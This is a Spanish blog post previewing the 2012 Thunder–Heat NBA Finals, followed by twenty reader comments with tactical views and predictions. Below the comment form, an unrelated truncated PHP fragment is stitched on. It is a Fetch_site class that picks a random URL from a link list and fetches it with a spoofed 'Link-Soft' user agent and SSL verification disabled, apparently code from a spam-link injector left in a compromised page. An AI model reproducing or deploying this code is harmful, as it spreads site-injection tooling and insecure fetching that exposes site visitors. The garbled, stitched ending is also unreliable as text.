Análisis Oklahoma City Thunder vs Miami Heat

12 de June de 2012 por TheDeerHunter

Todo lo bueno se acaba. El sentimiento dual que genera simultáneamente el clímax-crepúsculo final, en una temporada particularmente frenética, esa sensación, es si cabe más intensa habida cuenta que no todo el mundo apostaba que terminaría habiendo anillo en 2012.

Llegados a este punto, casi sorprende que después de toda la carga de incertidumbre que hemos vivido, el aluvión de partidos, las comprensibles rachas de juego y lesiones que han convertido esto en casi una lotería, sigan vivos los dos máximos favoritos al principio de curso. También, más que nunca, son los dos equipos que más se han merecido disputarse el título. Bien está lo que bien acaba.

Los Thunder vienen de haber triturado a la plana mayor al completo del Oeste desde la retirada de Michael Jordan: Mavericks, Lakers, Spurs, los campeones de conferencia de los últimos 13 años, propietarios del anillo de 10 de esos 13 posibles. Han sido capaces de endosarle 4 derrotas consecutivas a quienes sumaban nada menos que 20 seguidos ganados, unos Spurs que parecían invencibles… hasta cruzarse con ellos, por supuesto.

Los Heat han llegado hasta aquí superando varias situaciones límite. Se les ha enterrado ya en un par de ocasiones, prácticamente sin Chris Bosh, lesionado, y con una versión no especialmente brillante de Dwyane Wade. El Big Three ha derivado por momentos exclusivamente en un Big One. Sin embargo la versión más sobria y demoledora que hayamos visto de King James no es un factor a despreciar. El Elegido ha cumplido como el jugador individualmente más dominante de estos Playoffs. Puede ser el momento de su redención.

Sale perdiendo este año el gusto por el baloncesto más puramente colectivo. Que nadie espere muchas jugadas más elaboradas que un par de pases, una carrera y tiro/mate, contraataques a mansalva y mucho físico. Salen ganando los amantes del juego directo, individualmente excelso, de los duelos legendarios. Se miden cara a cara los dos mejores jugadores de la liga en su mejor momento, dos top 5 de anotadores en Playoffs de todos los tiempos, ambos aleros… Desde Bird vs Magic no veíamos un duelo comparable. Sólo por este motivo va a merecer la pena vivirlo.

Claves de la eliminatoria

– LeBron vs Durant: A la pugna por el anillo se añade la lucha por la corona de mejor jugador del mundo. Como no puede ser de otra manera, ambos personifican el estilo de sus equipos. James es más de desgaste constante para abrir brecha, Durant administra más su presencia pero se antoja mucho más determinante en los momentos clave. De cómo logren controlar los Thunder los envites de Miami y cómo se disputen los minutos determinantes dependerá el resultado final. Me intriga especialmente cómo les puede afectar el desgaste que supone marcarse el uno al otro y qué alternativas se van a plantear al respecto.

– Defense & Run: Por mucho que en nuestra mente haya una serie de estelares emparejamientos individuales posibles, en la práctica esa faceta se resolverá con la batería de especialistas defensivos con los que ambos cuentan en sus filas y el uso combinado de todos ellos. No lo decimos nunca, pero el trabajo sucio de gente como Sefolosha, Battier, Haslem, Collison, Perkins o Ibaka puede dar la vuelta a más de una eliminatoria. Así lo hemos comprobado las últimas semanas.

– El estado de Chris Bosh: Ha sido fundamental que el 4 estelar de Miami haya logrado ser productivo en la serie contra Boston. Se desconoce si la actuación en el 7º es flor de un día. Al 100% lo puede pasar mal contra los excelentes defensores interiores de Oklahoma. Sin un Bosh fino del que ocuparse, esa batería de tipos duros es, siendo suave, redundante.

– El factor James Harden: Es el desatascador Thunder. Su factor X más difícil de controlar por los Heat. Si él hace funcionar a los suyos los Heat lo pasarán mal.

– La experiencia: Como bien saben los Heat, el haber vivido una final es valor añadido. Fisher también lo sabe, por cierto.

Pronóstico 

Se trata de una de las apuestas más inciertas que me haya tirado a la cara. Puedo aventurarme a asegurar que se resolverá en no menos de 6. Si tengo que mojarme lo hago con un 4-3 para Thunder.

Comenta

20 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Coincido con el pronóstico, y en las claves añadiría también que Oklahoma puede dominar la dirección de los partidos a priori, y defender de alguna manera las transiciones rápidas de Miami (poquitas hicieron los Spurs contra ellos en la final de conferencia). Si entre Westbrook, Sefolosha y Fisher se comieron a todo un Tony Parker en el mejor momento de su carrera, el señor Chalmers puede pasar totalmente desapercibido en esta lucha. Aunque se supone que defenderá a Westbrook, pero para atacar no sé yo… principalmente se está viendo que hay dos jugadas en el estático de Miami: la individual de Lebron y la individual de Wade. Nada más. A priori la defensa de los Thunder se debe imponer. Sefolosha sobre Wade le va a crear muchos problemas, y veremos si Durant es el único tipo del mundo capaz de aguantar las embestidas del animalito. No obstante, está claro que el factor Bosh puede ser diferencial en esta serie, ya que hasta ahora ni Pau, ni Duncan, y solo Nowitzki en solitario, han sido capaces de sacar a sus pares fuera. Ahí se sienten incómodos Perkins e Ibaka. Yo utilizaría a Wade para construir y buscar in and out con Bosh. Puede ser una combinación ventajosa para Miami; si Lebron y Wade no pueden con sus marcas, buscar a Bosh abierto es una solución. Oklahoma tendrá serios problemas para defenderlo

      Citar

  2. Ru dice:
    #2

    Tengo mucha curiosidad por ver los emparejamientos en defensa de unos y otros,en los minutos finales muy probablemente se vean los choques de trenes pero en los inicios de partido probablemente veremos un Battier sobre Durant y un Ibaka sobre James.Poco más que decir,el análisis previo excelente.

    Desde punto de vista de negocio,la NBA jamás podría haber pensado en un fin de temporada como éste.Tengo mucha curiosidad por ver qué datos de audiencia producen las finales en Estados Unidos porque parece ser que estamos ante un hecho histórico y el duelo Durant-LeBron trae reminiscencias de la época dorada de la competición.

    A disfrutar del espectáculo ; )

      Citar

  3. Sancho88 dice:
    #3

    Ibaka sobre James????????????????????????? A ver, Ibaka no es mi abuela corriendo los 100 metros lisos, pero desde luego si James arranca Ibaka no le puede seguir en el desplazamiento ni de coña

      Citar

  4. GreenPride dice:
    #4

    Bueno, pues superado el pequeño trauma de la eliminación de mis Celtics ahora toca echar un vistazo a las finales que nos vienen encima. Series apasionantes en principio lo tienen todo para ser una lucha por todo lo alto.
    Por mi parte y visto lo visto en estos Playoffs empiezan como favoritos los Thunder pero sólo hay que recordar las dos últimas finales para ver que esto no dice mucho (en 2011 los favoritos Heat cayeron claramente con los Mavs y en 2010 los favoritos Lakers todavía tienen pesadillas verdes).
    En principio estas finales se presentan como las del duelo LeBron-Durant. El MVP contra el que muchos piensan que pudo serlo, los 2 mejores jugadores de la actual NBA, dos portentos frente a frente, además literalmente pues comparten posición en la cancha y llegan en la mejor forma de sus carreras. Los dos son imparables en ataque pero ¿se defenderán? Yo apuesto a que LeBron sí defenderá a Durant pero sólo en los minutos finales y antes probablemente el encargado sea Battier. En el otro lado espero a Sefolosha de inicio sobre LeBron y dependiendo de cómo vaya el partido sí que podría ser Durant el que intentase parar a LeBron (como ya hicieran con Kobe). Y aquí está el tema del juego en el clutch, donde Durant ha sido hasta ahora mucho mejor.
    Pero las finales son mucho más que este duelo y probablemente ambos hagan grandes números y puedan ser otros factores los que decidan:
    1) El resto del Big Three de ambos equipos: Con Bosh no totalmente recuperado veremos si sale de inicio o lo dejan de 6º hombre. Sea como sea el caso es que Westbrook-Harden han rendido algo mejor que Wade-Bosh pero en estas finales será importantísimo quienes de estas parejas se imponga. Probablemente Westbrook y Harden se alternarán en la defensa de Wade que ha tenido muchos problemas para anotar ante Boston sobre todo fuera de la zona (y ahora en la zona le esperarán Ibaka y cía.) El problema para los Heat será al revés, Wade coge a Westbrook o Harden pero cuando estén los 2 en pista ¿A quién coge Chalmers? Si Rondo les hizo un traje, Westbrook o Harden deberían hacerle otro. Por otro lado Bosh se mostró muy acertado en el 7º frente a Boston y volverá a ser clave en las opciones de los Heat ya que sin él en forma sufren mucho en ataque. Por los Thunder Westbrook deberá contribuir sin pasarse lanzando ni forzando entradas y Harden deberá imponer su juego y dar opciones a los demás con su buena manera de compartir la bola. Probablemente en estos 4 esté la clave de las finales
    2) Secundarios: Los secundarios de los Thunder hicieron la machada de imponerse al mejor banco de la competición que parecía ser el de los Spurs. Ibaka protegerá el aro y llega con mucha confianza en ataque. Perkins le ayudará bajo los aros aunque al no tener los Heat un pivot de referencia quizás pierda protagonismo y lo gane Collison, con más movilidad. Big Fish aportará su experiencia (unico Thunder que ha jugado finales) y será muy importante por su carácter y Sefolosha debe ser el secante de LeBron y Wade (a ratos con cada uno). Por los Heat muy necesarios los triples de Chalmers, Miller y Battier así como la defensa de este sobre Durantula. Haslem debe aportar dureza, rebotes y suspensiones para aliviar la presión sobre su Big Three y Anthony o Turiaf defensa interior de vez en cuando. En principio parecen mejor los secundarios de los Thunder pero la aportación puntual de Haslem, Chalmers o Battier puede resultar fundamental.
    3) Banquillos: Spoelstra ha tenido la suerte de recibir toda una lección de Doc Rivers en las finales de conferencia salvándose su equipo gracias a la superioridad física de LeBron y al último partido de Bosh mientras que Brooks ha sabido reaccionar a las trampas de Popovich para tomar la iniciativa en sus series. Por lo visto ventaja para los Thunder.
    4) Clutch: Si se llega a finales igualados los Thunder se han mostrado muchísimo más resolutivos en estos PO. Tanto Durant como Harden son jugadores con gran técnica y que suelen tomar grandes decisiones ya sea para anotar sin necesidad de forzar mucho sus tiros como para encontrar otros jugadores abiertos. Los Heat han tomado muy malas decisiones (único punto débil de LeBron en estos PO) y han perdido partidos por ello (también cuando ha sido Wade el que se la ha jugado). En general el problema para los Heat es que son muy previsibles y sus estrellas (LeBron y Wade) no son muy fiables desde fuera de la zona, lo cual si son las de los Thunder. En principio clara ventaja de los Thunder
    5) Pérdidas y juego a campo abierto: Los dos equipos son los más terribles de la competición al contraataque pero no hay nadie aquí como LeBron y Wade corriendo la cancha. Ambos deberán evitar pérdidas, intentar controlar el rebote y no lanzar malos tiros (Westbrook!!!!!) cosa que no será tan fácil pues ambos son equipos de alto ritmo de juego. Creo que veremos unas bonitas finales pues ambos gustan de jugar a tope, a grandes revoluciones. Pequeña ventaja Heat en este apartado
    6) Presión: Para los Heat siempre hay una presión tremenda y LeBron la tiene encima para lograr por fin un anillo que le encumbre definitavamente como el Rey. De momento está en el mejor momento de su carrera y haciendo unos PO históricos pero si no consiguen el título este año se hablará de fracaso. Enfrente los Thunder deben llegar más relajados lo que es un arma de doble filo si creen que ya lo han hecho todo aunque no creemos que sea el caso.
    7) Experiencia: Clara ventaja de los Heat en este apartado. Prácticamente todos los jugadores estuvieron en las finales del año pasado y el que no (Battier) tiene gran experiencia en la liga. Por los jóvenes Thunder sólo Fisher ha estado en las Finales y muchas veces se dice que hay que perder unas finales antes de ganarlas, veremos si les puede la inexperiencia de jugar unas finales aunque hasta ahora han pasado por encima de tres equipos (Mavs, Lakers y Spurs) que sumaban nada menos que 11 de los últimos 13 anillos disputados.
    En definitiva finales apasionantes, LeBronVsDurant, Big ThreeVsBig Three, Ibaka para los españoles y dos equipos con sus jugadores en su mejor momento y juego alegre en ambos casos ¡Que empiece el espectáculo!
    Pronóstico: Serie larga y LeBron vuelve a quedarse a las puertas porque Durantula y sus Thunder son mejores. Thunder en 6 o 7

      Citar

  5. GreenPride dice:
    #5

    No veo a Ibaka sobre James mucho tiempo, si acaso quedándose con él en los pick&rolls. Aquí va a ser fundamental el papel de Bosh y si hace continuaciones hacia el aro o se limita a tirar de media distancia. Si continúa al aro puede crear dudas en la defensa Thunder pero si no, creo que los Thunder harán cambios automáticos con todos los picks menos con Perkins lo que puede dificultar las penetraciones de LeBron y Wade que son su principal fuente de anotación.

      Citar

  6. nach dice:
    #6

    Yo estaba pensando exactamente en eso.
    Durant de falso 4 para evitar a LeBron, por lo menos en los primeros cuartos y jugar con Ibaka como 5.

    Está claro que una de las claves va a ser Bosh y su movilidad frente a Perkins, al que debería de buscar constantemente para sacarlo de la zona…

      Citar

  7. HisRoyalAirness dice:
    #7

    Ibaka emparejado con James es un caramelito para Lebron demasiado apetecible. Lo destruye, así de claro.

    Creo que se está centrando la cosa demasiado en el duelo evidente de aleros (lógico) pero como Wade se ponga en modo The Finals puede ser un aluvión incontenible, como fue el año pasado y en su único anillo. Creo que este año ha pasado muchos problemas físicos pero que va a resurgir.

    Mi pronóstico es para los Thunder en 6 y, si está bien Wade, en 7 cualquiera de los 2

      Citar

  8. HisRoyalAirness dice:
    #8

    A todo esto, lo leo mucho por ahí y se lo acabo de leer a Trecet en el blog (que yo creo que ultimamente habla un poco de memoria), el emparejamiento Lebron-Durant. Creo que, salvo en posesiones críticas en que James sí defenderá al de los Thunder, no se van a cruzar en la pista ni de broma.

      Citar

  9. HisRoyalAirness dice:
    #9

    “Los dos, Lebron y Wade, van a sufrir en esta serie. Pero nada comparado a lo que va a sufrir Bosh”

    Lo dicho, Trecet chochea

      Citar

  10. rumbero dice:
    #10

    HisRoyalAirness:
    Creo que se está centrando la cosa demasiado en el duelo evidente de aleros (lógico) pero como Wade se ponga en modo The Finals puede ser un aluvión incontenible, como fue el año pasado y en su único anillo.

    Yo también creo que Wade puede ser un factor decisivo, aunque no tengo tan claro que vaya a resurgir en modo Finals. Por lo visto hasta el momento veo muy difícil que Miami pueda sacar el rodillo y finiquitar los partidos a falta de 5-8 minutos contra un equipo como Oklahoma (sirvan como ejemplo los dos primeros partidos contra SAS donde fueron casi imparables en ataque y aun asi aguantaron). Además viendo como aprieta el público de Oklahoma la ventaja de campo va a ser un factor importante también. Así que James necesitará la mejor versión de Wade, sobretodo en los minutos calientes, a no ser que decida por fin dar un golpe en la mesa y quitarse todos los fantasmas de encima.
    Para mi son un algo más favoritos los Thunder por juego, aunque Miami llega con un Lebron estelar, un Bosh recuperado y habiendo remontado una serie que tenian cuesta arriba.
    4-3 para Thunders con clutch de Westbrook en el séptimo para disfrute de Nacho

      Citar

  11. nba dice:
    #11

    A pesar de que le dado bastantes palos a Westbrook a lo largo de la temporada, la clave del enfrentamiento final estará en el papel que decida ejercer Westbrook, sino se le va la pinza los Heat no tienen nada que hacer ante estos Thunder de Westbrook-Harden-Durant-Ibaka-Perkins.

      Citar

  12. Esteban dice:
    #12

    gooooooooooooo thunder!!

    aunque seguna aparicion seguida de lebron en finales, hace recordar a los 90 y el inicio de un gran jordan

    lebron no me cae bien, pero un titulo le dara una brillantez a su carrera que lo hara el mejor 3 de la historia, y dudo que solo logre un titulo y no mas

    el inicio de una rivalidad que marcara epoca por los proximos 3 o 4 años, q bello poder vivirlo

      Citar

  13. Esteban dice:
    #13

    durant puede jugar de 4 si, pero no con bosh en cancha, por mas amargo que sea bosh, con un par de fintas le sacara rapidas faltas a durant y si sale el de la cancha se pierde el anillo, si bosh sigue jugando poco y nada, durant si podria ir de 4 contra haslem o el propio battier

      Citar

  14. Jose Luis dice:
    #14

    @GreenPride

    Fisher ha jugado y ganado Finales, Perkins ha jugado y ganado Finales, y Nazr Mohammed ha jugado y ganado Finales. Son 3 jugadores que han ganado, cosa que en Miami sólo hay uno creo, que es Dwyane Wade, aunque como dices todos los demás sí que han jugado Finales (excepto las incorporaciones).

      Citar

  15. Sancho88 dice:
    #15

    José Luis, Haslem tb consiguió aquel anillo…

      Citar

  16. Jose Luis dice:
    #16

    Por la boca muere el pez jajajaja

      Citar

  17. HisRoyalAirness dice:
    #17

    Esteban:
    gooooooooooooo thunder!!

    aunque seguna aparicion seguida de lebron en finales, hace recordar a los 90 y el inicio de un gran jordan

    lebron no me cae bien, pero un titulo le dara una brillantez a su carrera que lo hara el mejor 3 de la historia, y dudo que solo logre un titulo y no mas

    el inicio de una rivalidad que marcara epoca por los proximos 3 o 4 años, q bello poder vivirlo

    La diferencia es que, aunque Lebron vaya a Finales consecutivas, Jordan las ganaba.
    No perdió ni una final. Y Kobe y Lebron 2 cada uno

      Citar

  18. Albertis dice:
    #18

    Hola,
    Cierto lo que dice Jose Luis, además de Fisher, Perkins también ha jugado finales y ganado un anillo.
    Me ciño al pronóstico y para mí los favoritos son los Thunder.
    Por qué?? Por que como se comentaba por aquí no creo que los Heat consigan tener ganado el partido antes de los 2 minutos finales y creo que este año este equipo de Oklahoma ha demostrado en bastantes finales apretados que tiene ese “don” de decantar la balanza de su lado, no veo en los Heat esa misma capacidad y es lo que me hace decantarme por los primeros.
    Gran artículo y posterior análisis de GreenPride.
    Un saludo.

      Citar

  19. GreenPride dice:
    #19

    Jose Luis, mea culpa totalmente por haberme olvidado de Perkins, que encima jugó 2 finales y ganó una con mis queridos Celtics… grave error por mi parte.
    Una vez visto el primer partido, mi primer comentario es que si Durant es más que LeBron y Westbrook más que Wade y claramente en ambos casos Miami no tiene nada que hacer ya que el resto del equipo es mejor en los Thunder que en los Heat. Luego comentamos con más calma

      Citar

  20. Hay Bolívar dice:
    #20

    Se impuso Lebron con su fuerza y categoría, ahora con Allen Heat mas fuertes y calientes q nunca

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>